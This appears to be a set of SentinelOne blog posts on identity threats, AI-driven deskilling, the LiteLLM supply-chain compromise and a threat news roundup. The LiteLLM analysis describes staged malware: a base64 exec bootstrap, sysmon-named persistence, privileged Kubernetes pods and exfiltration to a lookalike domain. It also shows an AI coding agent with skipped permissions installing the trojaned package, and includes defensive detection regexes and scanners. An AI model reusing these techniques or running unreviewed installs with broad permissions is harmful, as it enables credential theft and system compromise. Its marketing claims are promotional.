This evolution has created a fundamental security dilemma: organizations now collect more identity telemetry than ever before, yet identity-based intrusions remain some of the hardest attacks to detect. Security teams are facing what can only be described as the “Identity Paradox”.

More Identity Data, Less Clarity

The Identity Paradox reflects a growing imbalance in modern security operations. Enterprises have unprecedented visibility into authentication events, login attempts, and access logs, yet attackers continue to breach organizations using legitimate credentials. The reason is simple: an attacker using a valid identity does not look like an attacker. They look like an employee doing their job.

SentinelOne’s Steve Stone, Warwick Webb, and Matt Berry break down some of the key aspects of the “Identity Paradox”.

Under this guise, threat actors increasingly rely on techniques that inherit trusted sessions or legitimate credentials. These include stolen authentication tokens, adversary-in-the-middle (AiTM) phishing campaigns, compromised developer accounts, and even state-sponsored insiders. In each case, the attacker bypasses security by leveraging an identity that the system already trusts.

When authentication appears legitimate, traditional defenses struggle to distinguish between normal activity and malicious intent. The problem is further compounded by the wide spectrum of identity abuse methods now being observed in the wild.

When the Attacker Is an “Employee”

At one extreme of the identity threat landscape are traditional credential theft campaigns powered by phishing, infostealers, and session hijacking tools. At the other extreme are state-sponsored actors who continue to put significant effort into infiltrating organizations by applying for open roles directly.

In recent years, investigators have documented coordinated efforts by North Korean IT workers to obtain remote employment at Western technology firms. These individuals create elaborate fake personas using stolen identities and fabricated work histories to pass background checks.

In 2025 alone, SentinelLABS tracked over 1,000 job applications and roughly 360 fake personas linked to these operations. Once hired, these individuals operate as legitimate insiders with authorized access to corporate infrastructure. From a telemetry perspective, the account is valid. HR has approved the employee and login activity appears normal, yet the identity itself has been subverted.

This highlights the core challenge of identity defense: the system may validate who the user is, but it cannot easily validate their intent.

Supply Chains & Trusted Developers

The Identity Paradox also extends deeply into the software supply chain. Developers and maintainers of open-source packages often hold privileged access to repositories that are widely trusted by downstream users. When these accounts are compromised, attackers can inject malicious code into legitimate projects while appearing to operate as the original maintainer.

One example observed in late 2025 involved the “GhostAction” campaign, where attackers compromised a GitHub maintainer account and pushed malicious workflows designed to extract secrets from development pipelines. Similarly, a phishing attack against a maintainer of popular npm packages led to the deployment of malicious code capable of intercepting cryptocurrency transactions.

In both cases, the malicious commits originated from accounts with legitimate write access. Access controls were functioning exactly as designed. While the identity was verified, the intent behind the activity had changed.

The Expanding Identity Surface

As the definition of identity expands, employees are no longer the only actors operating within enterprise environments. Service accounts, APIs, workload identities, and AI agents are now executing actions across cloud platforms and SaaS environments at machine speed.

These non-human identities (NHIs) often operate with persistent privileges and broad access to critical resources. However, they are frequently overlooked in traditional identity governance frameworks. As organizations adopt automation and agent-driven workflows, non-human identities are rapidly becoming one of the fastest-growing attack surfaces in cybersecurity.

Traditional identity security models were built around human users and authentication events. That model does not translate well to NHIs, which can be ephemeral, programmatic, and massively scaled. In many environments, these automated identities vastly outnumber human users.

The Authorization Gap

The shift toward automation exposes another structural weakness in traditional identity security: the “Authorization Gap”. Security frameworks have historically focused on the moment of authentication as a gate that determines whether a user is allowed to enter. Organizations have accordingly invested heavily in stronger authentication mechanisms, granular permissions, and zero trust access models. These controls remain essential, but authentication alone cannot determine what happens after access is granted.

A fully authenticated user may still perform reconnaissance, exfiltrate sensitive data through a browser, or upload proprietary code into generative AI tools. Likewise, a correctly provisioned service account could be abused for lateral movement across cloud infrastructure. Once inside, traditional identity systems often assume legitimacy. This assumption creates a dangerous blind spot between who is allowed into the system and what they actually do once inside it.

Shifting the Focus to Behavior

Defeating the Identity Paradox requires a fundamental shift in how organizations think about identity security. Rather than focusing narrowly on authentication, defenders must broaden their scope to the behavior that occurs after login. Post-authentication behavioral monitoring allows security teams to identify deviations from expected activity patterns such as:

  • Access to sensitive repositories outside a developer’s normal workflow
  • Unexpected privilege changes or administrative actions
  • Bulk data exports from SaaS platforms
  • Identity-driven lateral movement across systems

These behavioral signals often reveal malicious activity long before traditional alerts trigger. Organizations should treat events such as new MFA device enrollments, OAuth permission grants, and service account privilege changes as high-risk signals that require close scrutiny. Restricting long-lived sessions, monitoring concurrent authentication activity, and auditing machine-to-machine trust relationships can significantly reduce an attacker’s ability to convert a single compromised credential into persistent access.
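To make one of these signals concrete, here is a toy sketch of bulk-export detection. The event format, role baseline, and threshold are all invented for illustration; real telemetry would come from SaaS audit logs and per-role baselines.

```python
from collections import Counter

# Hypothetical sketch of one post-authentication signal: flagging bulk data
# exports that exceed a per-user, per-hour baseline. Inputs are invented.
BASELINE_EXPORTS_PER_HOUR = 5  # assumed normal ceiling for this role

def flag_bulk_exports(events, threshold=BASELINE_EXPORTS_PER_HOUR):
    """events: (user, hour, action) tuples; return users exceeding the threshold."""
    counts = Counter((user, hour) for user, hour, action in events if action == "export")
    return sorted({user for (user, _), n in counts.items() if n > threshold})

events = (
    [("alice", 9, "export")] * 3      # normal activity
    + [("bob", 9, "export")] * 40     # anomalous burst
    + [("alice", 10, "login")]
)
print(flag_bulk_exports(events))  # ['bob']
```

Production systems would baseline per user and role rather than hard-coding a threshold, but even this simple shape shows why the signal fires on behavior, not credentials: bob's session authenticated normally.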

Conclusion | Defeating the Identity Paradox

Identity is both the attacker’s preferred entry point and the defender’s most valuable signal. Organizations that succeed in defending against identity-driven threats will be those that treat identity not as a static credential, but as a continuously monitored security boundary.

That means validating not only who is acting within the system, but also how that identity behaves over time, whether it belongs to a human employee, a service account, or an autonomous AI agent. As automation accelerates and machine-driven activity expands across enterprise environments, identity security must evolve accordingly.

SentinelOne’s® Autonomous Security Intelligence architecture is designed to support this expansion. It delivers comprehensive visibility and response across both human and non-human activity: Singularity Identity provides essential context around who (or what) is taking action, Prompt Security detects misuse within browsers and AI-driven workflows, and Singularity Endpoint verifies behavior directly at the system level.

Together, all three capabilities create a continuous execution layer that correlates activity across identities, applications, and devices. SentinelOne uniquely provides immediate, end-to-end visibility into GenAI usage along with data protection at every point of employee interaction on managed devices – all without requiring SASE redesigns or API-level integrations.

As advanced threats increasingly operate behind legitimate access and automation drives more machine-led activity, enterprise resilience hinges on securing execution itself in real time. SentinelOne is evolving identity from a static checkpoint into an ongoing system of behavioral validation, ensuring the integrity of every action across the enterprise, whether performed by a user, service account, or AI agent.

The Implementation Blind Spot | Why Organizations Are Confusing Temporary Friction with Permanent Safety

Across organizations, AI adoption is accelerating. Tools are being deployed, workflows are being restructured, and headcount decisions are being made against the assumption that AI will absorb the analytical load. Most leaders doing this work believe they are being careful because the technology keeps reminding them it isn’t ready yet.

This is a dangerous phase in any technological transition. While we are currently struggling to get these models to behave, to integrate them into our stacks, and to verify their messy outputs, we feel safe. We mistake the current difficulty of implementation for the inherent difficulty of the task. This is not just an error in judgment. It is a cognitive trap that will cost organizations their institutional knowledge and competitive advantage.

This trap has a name. The “cognitive rust belt” is the hollowing-out of human analytic capacity when organizations hand core thinking tasks to AI and stop exercising those skills themselves. It is happening now, across industries, hidden behind a wall of implementation friction that makes the problem invisible to the people experiencing it.

If you lived through the early days of the internet or the migration to the cloud, you know this feeling. You remember the broken APIs, the architectural wars, the endless debates about whether it would ever really work at scale. But there is a fundamental difference this time that most leaders are missing because they are too busy fighting with their prompts.

The critical question is not how hard AI is to implement today. It is what your organization looks like once it isn’t. This piece names that difference, explains why the current friction is masking the problem rather than preventing it, and gives you three questions to audit your exposure before the window closes.

Infrastructure vs. Intellect | The Category Difference

The transitions to the internet and the cloud were shifts in infrastructure. They changed where data lived and how it moved. They were, fundamentally, plumbing problems. Whether you were mailing a floppy disk or uploading to an S3 bucket, a human still had to do the analytical work. The friction was in the delivery mechanism, not the cognition itself.

The AI transition is categorically different. This is a shift in agency, not architecture. We are not just changing the pipes; we are changing who (or what) processes the data. And this distinction matters more than many organizations realize.

Consider a typical analysis task in 2010 versus today. In 2010, the challenge was getting the right telemetry in front of the analyst and doing it fast enough. You pulled server logs, endpoint artifacts, maybe a PCAP or a disk image, then you manually triaged. You grepped, pivoted, correlated timestamps across sources, built a timeline, extracted IOCs, assessed scope and impact, and wrote the recommendation: contain, eradicate, harden, detect. Infrastructure limited speed and scale, but the human remained the cognitive bottleneck.

Today, the hard part is “getting the AI to behave”: stop hallucinating, follow the format, use the right context, ground in the right evidence. But that framing hides what’s actually changing.

We are not just accelerating access to data, we are delegating the synthesis. When a model reads a week of EDR events, clusters related activity, proposes likely intrusion paths, summarizes the timeline, and drafts containment steps, it is not acting as infrastructure. It is acting as the junior analyst. The human’s job shifts from doing the reasoning to auditing it.

The problem is that right now, the cognitive rust belt is hidden behind that wall of technical frustration. Your team appears engaged because they are working hard to make AI work. They are debugging prompts, building verification pipelines, implementing guardrails. This looks like skill development. It is not. They are sharpening their troubleshooting skills for a tool that will eventually be frictionless, not sharpening their domain expertise.

When the friction disappears, and it will, what muscle memory will they have built? The ability to craft better prompts for a model that no longer needs careful prompting. The ability to verify outputs from a system that has become more reliable than their own domain knowledge. The ability to troubleshoot integrations that have been standardized and commoditized.

Why Senior Staff Can’t See This Problem

Those of us currently in the workforce grew up in the grunt work era. We built mental models, smell tests, and professional intuition through years of manual, often tedious labor. We learned to spot a flawed analysis not because we ran it through a verification checklist, but because something felt wrong. That instinct came from doing it wrong ourselves, repeatedly, at 2am with a deadline looming.

We view AI through the lens of a senior professional. To us, it is an assistant that handles the boring stuff while we provide the oversight. We find it nearly impossible to imagine a world where that intuition does not exist because it is already baked into our brains. We cannot un-know what we know.

This creates a massive blind spot. When you automate the entry-level rungs of the ladder, you are not “freeing people up for higher-level work.” You are removing the very gym where the mental muscles for that higher-level work are built.

The pattern holds across any profession where expertise is built through repetitive, often tedious, hands-on work. Research[1,2] on expert performance consistently finds that professional judgment develops not through instruction, but through repeated engagement with real problems — making errors, receiving feedback, and slowly recalibrating.

Think about how a senior financial analyst develops their sense for when a valuation model is off. It is not from reading the textbook on discounted cash flow. It is from building hundreds of models, getting the assumptions wrong, seeing the absurd outputs, and slowly calibrating their instincts. They develop a sensitivity to which levers matter and which are noise.

Now imagine a junior analyst whose first three years are spent reviewing AI-generated models. They can spot when the AI has made an obvious error because the revenue growth assumption is 400%. But can they spot when the model has used the wrong cost of capital framework for an emerging market acquisition? Can they sense when the comparable set is technically correct but strategically misleading?

The answer is no. Not because they are less intelligent, but because they never developed the error-detection patterns that come from making and fixing their own errors. They are one layer removed from the problem space. They are auditors of a system they have never operated.

This is not hypothetical. In domains where automation has already removed the grunt work, we see this pattern clearly. Pilots who learned to fly on highly automated aircraft have weaker manual flying skills and slower situational awareness when automation fails. Radiologists who trained primarily on AI-assisted systems show reduced ability to interpret edge cases the AI was not trained on. The pattern is consistent: when you remove the struggle, you remove the learning.

The Settled State Trap

Technology tends to follow a predictable evolutionary arc:

  • Friction Phase: For engineers, this is broken integrations and prompt failures. For the knowledge worker, it is wrestling with outputs that are close but wrong in ways that require domain knowledge to catch. For both, the technology’s unreliability is a forcing function. Humans stay cognitively in the loop not out of discipline, but because they have no choice.
  • Standardization Phase: Tooling matures. Best practices emerge. The knowledge worker’s experience smooths out significantly. The engineer moves on to the next integration challenge. For the person entering the workforce right now, this is where they arrive — they do not experience a friction phase at all.
  • Invisibility Phase: The tool becomes a utility. No one thinks about it. This is where electricity, indoor plumbing, and cloud infrastructure have landed. The person who joins the workforce in three years will have no memory of AI being anything other than ambient infrastructure. The forcing function is gone. There is nothing left to push back.

When AI reaches the invisibility phase, the current friction that keeps us engaged will vanish. We will not be prompt engineering. We will not be verifying outputs with a skeptical eye. We will not be debugging integration issues. We will be passively consuming results from a system that has become as invisible and trusted as our email client.

Look at how most knowledge workers interact with Excel. How many people using pivot tables understand the underlying algorithms? How many people using VLOOKUP could implement a lookup function from scratch? The answer is almost none, and that is fine for a deterministic tool with well-understood failure modes.
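To make the point concrete, here is roughly what an exact-match VLOOKUP does under the hood: a first-match scan down the leftmost column (the table data is invented for illustration).

```python
# A from-scratch sketch of Excel's exact-match VLOOKUP(value, table, col_index, FALSE).
# It scans the first column of each row for the lookup value and returns the
# cell at the (1-based) column index of the first matching row.

def vlookup(value, table, col_index):
    """Return table[row][col_index - 1] for the first row whose first cell == value."""
    for row in table:
        if row[0] == value:
            return row[col_index - 1]
    return None  # Excel would return #N/A here

prices = [("SKU-1", "Widget", 9.99), ("SKU-2", "Gadget", 24.50)]
print(vlookup("SKU-2", prices, 3))  # 24.5
```

A few lines of deterministic logic with well-understood failure modes; that transparency is precisely what probabilistic AI tooling lacks.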

But AI is not deterministic. Its failure modes are subtle, context-dependent, and often invisible to users who lack deep domain expertise. A model asked to assess a novel threat actor may confidently apply the closest historical pattern in its training data — attributing tradecraft to a known group because the techniques superficially match, while missing indicators that suggest an entirely different origin or objective. A model summarizing a week of endpoint telemetry may produce a clean, coherent timeline that happens to exclude the anomalous process behavior that doesn’t fit the pattern — not because it hallucinated, but because it normalized.

These are not hallucinations. They are plausible inferences that happen to be wrong in ways that require deep domain knowledge to detect. When AI reaches the settled state, most users will not have that knowledge. They will trust it the way they trust autocorrect: mostly correct, with occasional catastrophic failures they do not see coming.

What This Looks Like in Practice | The Alert That Closed Itself

A medium-severity alert arrives: suspicious child process spawning from a scheduled task. The execution chain shows intermittent lateral movement attempts using WMI, then silence. The AI triage system flags it as likely benign with low confidence because the process tree does not match common ransomware or C2 patterns in its training data.

Nobody escalates it. The closure rules were configured during initial deployment and have not been audited since. No one routinely samples low-confidence benign outcomes for false negatives. The response automation closes the ticket.

Two weeks later, the security team discovers lateral movement to a domain controller and evidence of credential harvesting. The adversary used a novel persistence technique (living-off-the-land binary abuse combined with registry modification, not flagged by endpoint detection). They moved laterally just enough to establish access, then went dormant. During those two weeks, they exfiltrated architectural diagrams, credential databases, and HR records.

Now the team tries to reconstruct the attack timeline and discovers the deeper problem: they cannot. They have been living inside summaries, not raw telemetry. When they pull the original endpoint logs, they realize they do not know how to correlate process trees with authentication events manually. They do not know what normal scheduled task behavior looks like in their environment because they have never needed to examine it directly.

The incident response firm they hire charges $450/hour and takes three days to produce the timeline the internal team should have been able to reconstruct in six hours.

The executive debrief asks why the alert was closed. The answer is uncomfortable: nobody questioned the automation.
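The missing control in this scenario is cheap to build: routinely sample auto-closed, low-confidence benign verdicts for human review. A minimal sketch, assuming hypothetical alert field names and an illustrative confidence threshold:

```python
import random

def sample_for_audit(closed_alerts, rate=0.05, seed=None):
    """Randomly sample auto-closed, low-confidence 'benign' verdicts
    for periodic human review. Field names and the 0.6 threshold are
    illustrative, not a real product schema."""
    rng = random.Random(seed)
    candidates = [a for a in closed_alerts
                  if a["verdict"] == "benign" and a["confidence"] < 0.6]
    # Always pull at least one candidate when any exist
    k = max(1, int(len(candidates) * rate)) if candidates else 0
    return rng.sample(candidates, k)

alerts = [
    {"id": 1, "verdict": "benign", "confidence": 0.4},
    {"id": 2, "verdict": "benign", "confidence": 0.9},
    {"id": 3, "verdict": "malicious", "confidence": 0.8},
]
print(sample_for_audit(alerts, seed=7))  # surfaces alert 1 for review
```

A review queue like this costs an analyst a few minutes a week and is the difference between discovering a false negative in days rather than in a post-incident debrief.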

The Forward-Thinking Audit

The trap is avoidable, but the window is closing. Audit your exposure now, while the friction still makes the problem visible. Once AI reaches the settled state, the expertise gap will already be locked in. Three questions:

  1. If your senior staff retired tomorrow, could your current junior employees replicate their gut instinct decisions using only the tools provided?

This is not asking whether they could do the job adequately with training. This is asking whether they have built the foundational mental models that allow them to recognize when the tools themselves are insufficient or misleading.

If your honest answer is no, you need to map out which specific experiences and failure modes your seniors went through that your juniors are now being protected from. Those protected experiences are the foundation your organization’s future judgment is built on.

Every year you defer addressing this, that foundation gets thinner.

  2. Are you building workflows that require human judgment, or are you building verification loops where a human clicks “approve” on a machine-generated task?

There is a critical difference. Human judgment means the person is actively constructing part of the solution, making trade-off decisions with incomplete information, and applying contextual knowledge that is not fully captured in any system. Verification means checking whether an output meets a predefined quality bar.

Verification is valuable. But if it is the only cognitive work your junior staff is doing, they are not developing judgment. They are developing quality assurance skills. When the AI gets good enough that verification becomes pro forma, what expertise will they have built?

  3. Do you know which manual skills in your department are currently being treated as waste to be eliminated, but are actually the training data for your future leaders?

Here is a heuristic: if the task requires making multiple small judgment calls based on contextual knowledge, it is probably building expertise even if it is boring. If the task is purely procedural with no meaningful decision points, it is probably safe to automate.

The danger zone is tasks that appear procedural but actually contain implicit judgment calls that experts have internalized to the point of unconsciousness. These are the tasks where automation removes learning opportunities that are invisible to the people designing the automation.

The Uncomfortable Conclusion

The cognitive rust belt is not a future threat. It is a slow-motion oxidation happening right now, masked by the noise of implementation. If you answered “no” to any of the three questions above, you are not looking at a future risk. You are looking at a gap that is already open. What you do with that answer is the only variable still in play.

Every organization currently deploying AI is making an implicit bet: that the current friction will last long enough for them to figure out the expertise development problem. That bet is likely wrong. The technology is improving faster than organizational learning cycles. By the time most companies realize they have a problem, the expertise gap will already be unbridgeable.

The hardest part of this problem is that it runs against every instinct of modern management. You are being told to preserve inefficiency, to intentionally slow down processes that could be automated, to force junior staff to do manual work that appears wasteful. This feels wrong because in almost every other context, it is wrong.

But the difference is that in most contexts, the inefficiency is pure waste. In this context, the inefficiency is the education. The struggle is not a bug to be eliminated; it is the feature that builds expertise.

The three questions above address what your organization does next. The harder question, how we got here and what the systematic hollowing-out of analytic capacity looks like across an entire profession, is worth examining on its own terms. If you wait for the technology to settle before you address this, you will find there is nothing left to save. The time to build organizational muscle memory is while the weights are still heavy. Once they become weightless, the gym is closed.

How SentinelOne’s AI EDR Autonomously Discovered and Stopped Anthropic’s Claude from Executing a Zero Day Supply Chain Attack, Globally

Host-based behavioral autonomous AI detection is by far the most effective way to generically see and stop rogue or malicious activity, whether driven by humans or by machine-speed AI agents.

On March 24, 2026, SentinelOne’s autonomous detection caught what manual workflows never could have: a trojaned version of LiteLLM, one of the most widely used proxy layers for LLM API calls, executing malicious Python across multiple customer environments. The package had been compromised hours earlier. No analyst wrote a query. No SOC team triaged an alert. The Singularity Platform identified and blocked the payload before it could run, across every affected environment, on the same day the attack was launched.

The LiteLLM supply chain compromise is not an anomaly. It is the new pattern: multi-stage, multi-surface, designed to evade manual workflows at every turn. A compromised security tool led to a compromised AI package, which led to data theft, persistence, Kubernetes lateral movement, and encrypted exfiltration, all within a window measured in hours.

SentinelOne detected and blocked this attack autonomously, on the same day it was launched, across multiple customer environments. No manual triage. No signature update. No analyst in the loop for the initial containment. This is what autonomous, AI-native defense looks like when it meets a real-world threat at machine speed.

The gap between the velocity of this attack and the capacity of human-driven investigation is the gap where organizations get compromised. Closing that gap is not a feature request. It is an architectural decision. This is what happens when AI infrastructure gets targeted by a multi-stage supply chain campaign, and what it looks like when autonomous, AI-native defense is already in position.

Here is what we detected, how the attack was structured, and why this is the class of threat that the Singularity Platform was built to stop.

Autonomous Detection at Machine Speed

SentinelOne’s macOS agent identified and preemptively killed a malicious process chain originating from Anthropic’s Claude Code running with unrestricted permissions (claude --dangerously-skip-permissions). No human developer ran pip install; an autonomous AI coding assistant updated LiteLLM to the compromised version as part of its normal workflow.

The AI engine classified the behavior as MALICIOUS and took immediate action: KILLED (PREEMPTIVE) across 424 related events in under 44 seconds. The agent didn’t need to know the package was compromised; it watched what the process did and stopped it based on behavior, regardless of what initiated the install.

Catching the Payload in the Act

The macOS agent caught the trojaned LiteLLM package mid-execution. The process summary tells the story: python3.12 launching with a command line containing import base64; exec(base64.b64decode(..., the exact bootstrap mechanism described in the attack’s first stage, decoding and executing the obfuscated payload in a child process.

The agent didn’t need a signature for this specific package. It recognized the behavioral pattern, a Python interpreter executing base64-decoded code in a spawned subprocess, classified it as MALICIOUS, and killed it preemptively before the stealer, persistence, or lateral movement stages could deploy.
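A crude approximation of that pattern can be expressed as a command-line heuristic. The sketch below is illustrative only; it is not SentinelOne's detection logic, which operates on observed process behavior rather than string matching:

```python
import re

# Flag interpreter command lines that decode and execute an inline
# base64 payload -- the bootstrap shape described above.
DECODES = re.compile(r"b64decode|base64\s+-d", re.IGNORECASE)
EXECUTES = re.compile(r"\bexec\s*\(|\beval\s*\(")

def is_decode_exec(cmdline: str) -> bool:
    """True when a command line both decodes base64 and executes
    the result -- a high-signal, low-cost triage heuristic."""
    return bool(DECODES.search(cmdline) and EXECUTES.search(cmdline))

print(is_decode_exec(
    'python3.12 -c "import base64; exec(base64.b64decode(payload))"'))  # True
print(is_decode_exec("python3.12 manage.py runserver"))  # False
```

Attackers trivially evade string matching (hex encoding, compile(), staged downloads), which is exactly why behavioral detection of what the spawned process actually does matters more than any one pattern.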

The Full Process Tree: Containing the Blast Radius

Zooming out on the same detection reveals the full scope of what the autonomous AI agent was doing when the payload fired. The process tree expands from Claude Code (2.1.81) into a sprawling chain: zsh, bash, node, uv, ssh, rm, python3.12, mktemp, with hundreds of child events still loadable (304 events captured). This is what unrestricted AI agent activity looks like at the endpoint level: a single command spawning an entire dependency management workflow that pulled, installed, and attempted to execute the trojaned package.

The SentinelOne macOS agent traced every branch of this tree, correlated the events back to the root cause, and killed the malicious execution, all while preserving the full forensic record for investigation.

The Compromise Was Indirect. That’s What Makes It Dangerous.

The attacker, operating under the alias TeamPCP, never attacked LiteLLM directly. They first compromised Trivy, a widely trusted open-source security scanner, on March 19. From there, they obtained the LiteLLM maintainer’s PyPI credentials and used them to publish two malicious versions: 1.82.7 and 1.82.8.

A security tool, built to find vulnerabilities, became the vector that enabled the compromise of an AI infrastructure package used by thousands of organizations. The same actor went on to compromise Checkmarx KICS and AST on March 23, and Telnyx on March 27. This was not a smash-and-grab. It was a coordinated campaign that exploited the transitive trust woven through open-source supply chains.

For security leaders asking, “Could this have reached us?” the more pressing question is: “How fast could we have answered that?”

A New Attack Surface: AI Agents With Unrestricted Permissions

In one customer environment, SentinelOne detected the infection arriving through an unexpected vector: an AI coding assistant running with unrestricted system permissions autonomously updated LiteLLM to the trojaned version without human review. The update pulled the infected package, and the payload attempted to execute. Our agent blocked it.

This is a new class of attack surface that most organizations have not yet scoped. AI coding agents operating with full system permissions can become unwitting vectors for supply chain compromises. The speed and automation that make these tools valuable are the same properties that make them dangerous when the packages they pull have been weaponized. Organizations that have not yet established governance policies for AI assistant permissions are carrying risks they cannot see.

SentinelOne’s behavioral detection operates below the application layer. It does not matter whether a malicious package is installed by a human, a CI pipeline, or an AI agent. The platform monitors process behavior via the Endpoint Security Framework, which is why this detection fired regardless of how the infected package arrived.

Two Infection Vectors, One Designed to Run Without You

Version 1.82.7 embedded its payload in proxy_server.py, which executes every time the litellm.proxy module is imported. For anyone using LiteLLM as a proxy layer for LLM API calls, this fires constantly during normal operations.

Version 1.82.8 escalated. The attacker placed the payload in a .pth file, litellm_init.pth. Files with the .pth extension are processed by the Python interpreter at startup, regardless of which modules are imported. Any Python script running on a system with this version installed would trigger the malicious code, even if that script had nothing to do with LiteLLM.

If version 1.82.7 was a targeted shot, version 1.82.8 was a blast radius expansion. The attacker removed the requirement that the victim actually use the compromised library.
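The .pth trick abuses documented Python behavior: at interpreter startup, the site module executes any line in a site-packages .pth file that begins with "import" followed by a space or tab. A defensive audit for code-bearing .pth lines might look like the hedged sketch below (not an official tool; expect some benign hits from packaging shims):

```python
import site
from pathlib import Path

def is_executable_pth_line(line: str) -> bool:
    """The site module runs .pth lines that start with 'import ' (or a
    tab) at startup; a semicolon after the import lets arbitrary
    statements ride along, as the 1.82.8 payload did."""
    return line.startswith(("import ", "import\t")) and ";" in line

def scan_site_packages():
    """Audit installed .pth files for code-bearing lines."""
    findings = []
    for sp in site.getsitepackages():
        for pth in Path(sp).glob("*.pth"):
            for line in pth.read_text(errors="ignore").splitlines():
                if is_executable_pth_line(line):
                    findings.append((str(pth), line[:80]))
    return findings

for path, line in scan_site_packages():
    print(f"{path}: {line}")
```

Legitimate tools (setuptools, coverage) also ship executable .pth lines, so the output is a review list, not a verdict. The point is that the mechanism is auditable in a dozen lines once you know it exists.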

What the Payload Did Once Inside

The attack was structured as a multi-stage delivery system, each stage decoding, decrypting, and executing the next. The first stage was a minimal bootstrap, a single line of base64-decoded Python launched in a detached subprocess with stdout and stderr suppressed. Lightweight enough to slip past signature-based tools. Quiet enough to avoid raising flags.

The second stage was a comprehensive data stealer. It harvested system and user information, cryptocurrency wallets, cloud credentials, application secrets, and system configurations. For practitioners wondering what the blast radius looks like if a developer workstation is compromised, this is the answer: the attacker collects everything needed to move from a laptop to production infrastructure.

The third stage established persistence through a systemd user service at ~/.config/systemd/user/sysmon.service, executing a script at ~/.config/sysmon/sysmon.py. The naming convention, “sysmon,” was deliberately chosen to mimic legitimate system monitoring tools. It is designed to survive casual inspection and blend into environments where dozens of services run as expected background noise. This is precisely the kind of evasion that signature-based detection misses and behavioral AI catches: the process looks normal until you observe what it actually does.

The persistence mechanism included a 5-minute initial delay before any network activity, a technique specifically designed to outlast automated sandbox analysis. After that, the script contacted its C2 server every 50 minutes, fetching dynamic payload URLs. This sparse communication pattern makes behavioral detection through network monitoring significantly harder, and gives the attacker the ability to push new tooling without ever re-compromising the target.

It Moved Laterally Through Kubernetes

The attack did not stop at the workstation. It created privileged pods across Kubernetes cluster nodes in the kube-system namespace, using standard container images like alpine:latest, with hostPID, hostNetwork, and a privileged security context. By mounting the host filesystem directly, these pods gained root-level access to underlying nodes.

Each pod deployed persistent backdoors as systemd services on the host system. The pods operated in legitimate namespaces, used standard images, and ran with privileges that many production workloads legitimately require. For SOC practitioners asking whether their admission control and runtime detection would have caught this: the attack was designed specifically so they might not. Detecting this requires runtime visibility into container behavior after deployment, not just policy enforcement at the admission gate. This is the difference between cloud security that checks configuration and cloud security that watches execution.
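The pod settings described above are straightforward to enumerate once you have the manifest. A minimal check over a pod spec dict, as parsed from kubectl get pod -o json; the field names follow the Kubernetes PodSpec API, but the rule set is an illustrative sketch, not a policy engine:

```python
def risky_pod(spec: dict) -> list:
    """Return the high-risk settings present in a PodSpec dict,
    checking for the combination the TeamPCP pods used:
    hostPID + hostNetwork + privileged containers + host mounts."""
    flags = []
    if spec.get("hostPID"):
        flags.append("hostPID")
    if spec.get("hostNetwork"):
        flags.append("hostNetwork")
    for c in spec.get("containers", []):
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            flags.append(f"privileged:{c.get('name', '?')}")
        for vm in c.get("volumeMounts", []):
            if vm.get("mountPath") == "/host":
                flags.append(f"hostMount:{c.get('name', '?')}")
    return flags

# Example shaped like the attack's pods
pod = {"hostPID": True, "hostNetwork": True,
       "containers": [{"name": "worker", "image": "alpine:latest",
                       "securityContext": {"privileged": True}}]}
print(risky_pod(pod))  # → ['hostPID', 'hostNetwork', 'privileged:worker']
```

As the article notes, a static check like this only catches the configuration; workloads that legitimately need these privileges will also match, which is why runtime visibility into what the container does after admission remains the deciding control.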

Exfiltration Was Encrypted and Camouflaged

Stolen data was encrypted using a hybrid RSA and AES-256-CBC scheme. A random 32-byte AES session key encrypted the data, then the session key itself was protected with RSA encryption using a hardcoded public key. This meant the malware could encrypt and exfiltrate without first communicating with the C2 server. The encrypted payload was packaged as tpcp.tar.gz and transmitted via a single HTTP POST to models.litellm.cloud, a domain chosen to blend with legitimate LiteLLM API traffic and slip past network monitoring that whitelists expected destinations.


Why This Detection Worked: Architecture, Not Luck

The LiteLLM detection wasn’t a one-off. It’s what happens when autonomous, behavioral AI is built into the foundation, not bolted on after the fact. The Singularity Platform’s visibility across endpoint, cloud, identity, and AI workloads is why the agent saw this regardless of whether the install came from a human, a CI pipeline, or an AI coding assistant.

For teams that need the human expertise layer on top, Wayfinder MDR extends that autonomous detection with 24/7 investigation and response, closing the gap between detection and resolution.

This is the Autonomous Security Intelligence (ASI) framework in practice: AI that acts at machine speed, backed by human expertise when it matters, across every surface the attack can reach. See how the Singularity Platform protects AI infrastructure and request a demo today.


The Good, the Bad and the Ugly in Cybersecurity – Week 13

The Good | U.S. Jails Ransomware Actors, Extradites Alleged RedLine Operator

The DoJ has secured an almost seven-year prison sentence for Russian national Aleksey Volkov, who was also ordered to pay full restitution for acting as an initial access broker in Yanluowang ransomware attacks. Between 2021 and 2022, he breached multiple U.S. organizations and sold network access to affiliates who deployed ransomware and demanded payments up to $15 million. Arrested in Italy in 2024 and later extradited, Volkov pleaded guilty in 2025. Investigators have since tied him to over $9 million in losses using digital evidence, including chat logs and iCloud data.

For Ilya Angelov, a fellow Russian citizen, U.S. courts have doled out two years in prison for co-managing a phishing botnet used to enable BitPaymer ransomware attacks against 72 major companies across the States. From 2017 to 2021, the crime group known as TA551 distributed malware via massive spam campaigns, infecting thousands of systems daily and selling access to other cybercriminals. These operations generated over $14 million in ransom payments. Angelov later traveled to the U.S. to plead guilty following the Russian invasion of Ukraine in 2022 and has been fined $100,000 on top of his sentence.

Law enforcement have also extradited Hambardzum Minasyan to the United States to face charges for allegedly helping to operate the RedLine infostealer malware service. According to the prosecution, the Armenian national managed RedLine’s infrastructure, including servers, domains, and cryptocurrency accounts used to support affiliates and distribute malware, and laundered the illicit proceeds. The operations enabled large-scale data theft from infected systems, targeting corporations and individuals. He now faces multiple cybercrime charges and could receive up to 30 years in prison if convicted.

Source: FBI Instagram

The Bad | Hackers Deploy FAUX#ELEVATE Malware via Phishing Résumés

Cyberattackers have set their sights on French-speaking professionals, luring victims with fake résumé attachments in an active phishing campaign designed to deploy credential stealers and cryptocurrency miners. The activity, now tracked as FAUX#ELEVATE, relies on heavily obfuscated VBScript files disguised as CV documents, which execute silently while displaying fake error messages. The malware uses sandbox evasion, persistence techniques, and a domain-check mechanism to ensure only enterprise systems are infected.

Source: Securonix

Once the attackers gain elevated privileges, they disable security defenses, modify system settings, and download additional payloads from legitimate platforms and infrastructure like Dropbox, Moroccan WordPress sites, and mail[.]ru. This abuse of valid services allows the attackers to stage the payloads, host a command and control (C2) configuration, and exfiltrate browser credentials and desktop files.

The campaign stands out for its “living-off-the-land” approach, which is defined by blending malicious activity with trusted services to evade detection. It also uses advanced techniques to bypass browser encryption and maximize system resource exploitation. After execution, most artifacts are removed to limit forensic visibility, leaving only persistent mining and backdoor components.

